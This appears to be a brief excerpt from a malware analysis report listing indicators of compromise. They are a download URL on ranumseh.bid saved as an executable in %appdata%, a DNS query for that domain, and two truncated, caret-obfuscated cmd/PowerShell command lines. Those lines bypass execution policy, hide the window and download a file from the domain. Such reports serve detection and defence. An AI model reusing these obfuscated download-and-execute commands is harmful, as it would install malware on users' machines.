Technical Information
- http://ranumseh.bid/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowER^SHE^ll.ex^E -EXecut^i^onPO^l^Ic^y b^Y^PasS^ -NO^pROFILE ^-^Win^DOWS^T^YlE ^Hi^DdeN (neW-o^BJ^Ec^t S^Ys^t^EM.nE^t.W^Eb^CL^i^E^nT).D^o^wN^LoADfIle(^'http://ranumseh....
- DNS ASK ra###seh.bid
- '<SYSTEM32>\cmd.exe' /c "PowER^SHE^ll.ex^E -EXecut^i^onPO^l^Ic^y b^Y^PasS^ -NO^pROFILE ^-^Win^DOWS^T^YlE ^Hi^DdeN (neW-o^BJ^Ec^t S^Ys^t^EM.nE^t.W^Eb^CL^i^E^nT).D^o^wN^LoADfIle(^'http://ranumseh....' (with hidden window)